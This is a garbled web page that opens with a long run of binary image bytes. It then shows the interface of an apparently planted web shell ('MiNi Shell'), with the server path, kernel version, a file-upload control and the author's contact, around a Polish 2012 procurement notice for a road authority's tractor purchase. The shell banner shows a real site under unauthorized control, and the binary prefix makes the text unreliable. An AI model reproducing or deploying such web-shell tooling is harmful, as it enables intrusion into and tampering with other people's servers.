JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120813/299264-N-2012.html

<p class="kh_header"><b>Kartuzy: Wykonanie:  zakupu  z dostawą  na plac Zamawiającego ciągnika rolniczego w 2012.</b><br>
<b>Numer ogłoszenia: 299264 - 2012; data zamieszczenia: 13.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Kartuzach , ul. Gdańska 26, 83-300 Kartuzy, woj. pomorskie, tel. 058 6810715, faks 058 6811522.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zdp.kartuzy.ibip.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://zdp.kartuzy.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie:  zakupu  z dostawą  na plac Zamawiającego ciągnika rolniczego w 2012..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje:
     a) Wykonanie:  zakupu  z dostawą  na plac Zamawiającego ciągnika rolniczego 
          w 2012 - do  Obwodu Drogowego w Sierakowicach   ul. Brzozowa 1.

3.3.  Wymagania  techniczne  ciągnika. 

Wymagania  techniczne  ciągnika. 
 1. Ciągnik rolniczy fabrycznie nowy, rok produkcji  2011 lub 2012, spełniający aktualne wymagania z zakresu BHP oraz dopuszczony do poruszania się po drogach publicznych zgodnie z przepisami Prawo o Ruchu Drogowym. 
2. Rodzaj paliwa - olej napędowy                                                            
3. Moc  nominalna silnika  co najmniej 100kM  przy 2100obr/min.
4. Silnik trzy  z zapłonem samoczynnym, z wtryskiem bezpośrednim common rail
  spełniający normy emisji spalin co najmniej  EURO III  
5. Skrzynia  biegów z rewersem elektrohydraulicznym. 
6. Skrzynia  biegów synchronizowana 12 do przodu i 12 do tyłu. 

7. Możliwość jazdy w ruchu drogowym  z prędkością do  40 km/h                                
8. Sterowanie elektrohydrauliczne   podnośnika hydraulicznego  
9. Wałek odbioru mocy 540/540E
10. Sprzęgło  tarczowe  mokre
11. Instalacja elektryczna 12 V
12 . Kabina  z klimatyzacją, siedziskiem dla pasażera. Dopuszcza się szyby przyciemniane   wyposażone w przednie i tylnie wycieraczki. Zamontowana Instalacja radiowa .
13. W ramach  oświetlenia  wymagamy wyposażenia  w  2 - główne  światła  drogowe, 2- reflektory  robocze z przodu, 2- reflektory  robocze  z tyłu , światła  ostrzegawcze i kierunkowskazy
14. Przednie koła w rozmiarze  R 24   
15. Tylnie  koła  w rozmiarze   R 34
16. Napęd na cztery koła 4x4
17. Układ pneumatyczny  do sterowania  hamulcami  przyczepy trzy pary wyjść na tył
18. Wzmocniona  rama  ciągnika  
19.  Rozdzielacz  hydrauliki  zewnętrznej trzy sekcyjny  plus dwie  pary wyjść na  
      przód ciągnika. 
20. Błotniki przednie.
21. Ciągnik należy wyposażyć także  w błotniki tylne, trójkąt ostrzegawczy,
gaśnicę, apteczkę, napis SŁUŻBA DROGOWA, zestaw narzędzi.       
22. Gwarancja na ciągnik co najmniej 24 miesięcy

23. Homologacja  
24. Obciążniki osi przedniej - minimum 300 kg, 

25. Udokumentowanie danych fabrycznych w języku polskim, 

3.4.Zamawiający określa dodatkowe wymagania związane z przedmiotem zamówienia: 
a) Do dostarczonego ciągnika należy załączyć dokumentację techniczną, w tym instrukcje
   obsługi w języku polskim, katalog części zamiennych i podzespołów, warunki gwarancji i
   książki gwarancyjne, CE producenta sprzętu pochodzących z produkcji seryjnej, 
   dokumenty DTR. 
b) Wykonawca zamówienia wykona wstępne przeszkolenie pracownika Zamawiającego dot.
   uruchomienia i obsługi dostarczonego ciągnika, objętego zamówieniem.
3.5. Zamawiający wymaga aby odległość dojazdu serwisu wynosiła nie więcej niż 200 km do miejsca  dostawy do ZDP Kartuzy tj: Obwodu Drogowego w Sierakowicach ul. Brzozowa 1
3.6. Miejsce dostawy - plac Zamawiającego, tj: Obwód Drogowy w Sierakowicach ul. 
  Brzozowa 1.
3.7. Odbiór dostawy dokonany będzie przez pracownika wskazanego przez Zamawiającego
   w obecności przedstawiciela Dostawcy. 
4.0.Gwarancja jakości. 
4.1. Wykonawca na dostarczony fabrycznie nowy ciągnik udzieli gwarancji na okres
   minimum 24 m-cy bez określenia limitu motogodzin pracy ciągnika Okres gwarancji liczony
   będzie od daty sporządzenia protokółu przekazania. W okresie gwarancji Wykonawca
   zobowiązuje się w terminie 2 dni od telefonicznego lub pisemnego powiadomienia
   przystąpić do usunięcia awarii ciągnika ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje  udzielenie  zamówienia  uzupełniającego na podstawie   art.37ust.1pkt7 ustawy   Pzp w ilości  do 20% przedmiotowego zamówienia  w zakresie  zgodnym  z punktem 3.0 SIWZ</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 16.70.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferent  przystępując do przetargu  nie wnosi wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień. Warunek zostanie uznany za spełniony, jezeli Wykonawca wraz z ofertą złoży oświadczenie o spełnieniu warunków udziału w postepowaniu, o których mowa w art. 22 ust1 ustawy Pzp. zgodnie z załaczonym formularzem - załącznik nr 3 do SIWZ. W/w warunek Zamawiający bedzie sprawdzał metodą spełnia/ nie spełnia na podstawie złożonego oświadzczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jezeli Wykonawca wraz z ofertą złoży oświadczenie o spełnieniu warunków udziału w postepowaniu, o których mowa w art. 22 ust1 ustawy Pzp. zgodnie z załaczonym formularzem - załącznik nr 3 do SIWZ. W/w warunek Zamawiający bedzie sprawdzał metodą spełnia/ nie spełnia na podstawie złożonego oświadzczenia .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jezeli Wykonawca wraz z ofertą złoży oświadczenie o spełnieniu warunków udziału w postepowaniu, o których mowa w art. 22 ust1 ustawy Pzp. zgodnie z załaczonym formularzem - załącznik nr 3 do SIWZ. W/w warunek Zamawiający bedzie sprawdzał metodą spełnia/ nie spełnia na podstawie złożonego oświadzczenia .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jezeli Wykonawca wraz z ofertą złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust1 ustawy Pzp. zgodnie z załaczonym formularzem - załącznik nr 3 do SIWZ. W/w warunek Zamawiający bedzie sprawdzał metodą spełnia/ nie spełnia na podstawie złożonego oświadzczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jezeli Wykonawca wraz z ofertą złoży oświadczenie o spełnieniu warunków udziału w postepowaniu, o których mowa w art. 22 ust1 ustawy Pzp. zgodnie z załaczonym formularzem - załącznik nr 3 do SIWZ. W/w warunek Zamawiający bedzie sprawdzał metodą spełnia/ nie spełnia na podstawie złożonego oświadzczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy wykonawcy- wraz z Tabelą zgodności parametrów przedmiotu zamówienia.Pełnomocnictwo do reprezentowania podmiotów występujacych wspólnie lub do występowania wspólnie i zawarcia umowy w przypadku składnia oferty wspólnej .</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartych w umowie, przez sporządzenie aneksu w zakresie : - terminu realizacji dostaw w przypadku a) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na termin realizacji przedmiotu zamówienia lub świadczenia stron; b) zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - oraz pozostałych warunków umowy w przypadku powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zdp.kartuzy.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych  w Kartuzach ul. Gdańska 26
83-300 Kartuzy, pok.26.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2012 godzina 10:45, miejsce: Zarząd Dróg Powiatowych  w Kartuzach ul. Gdańska 26
83-300 Kartuzy, pok.30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com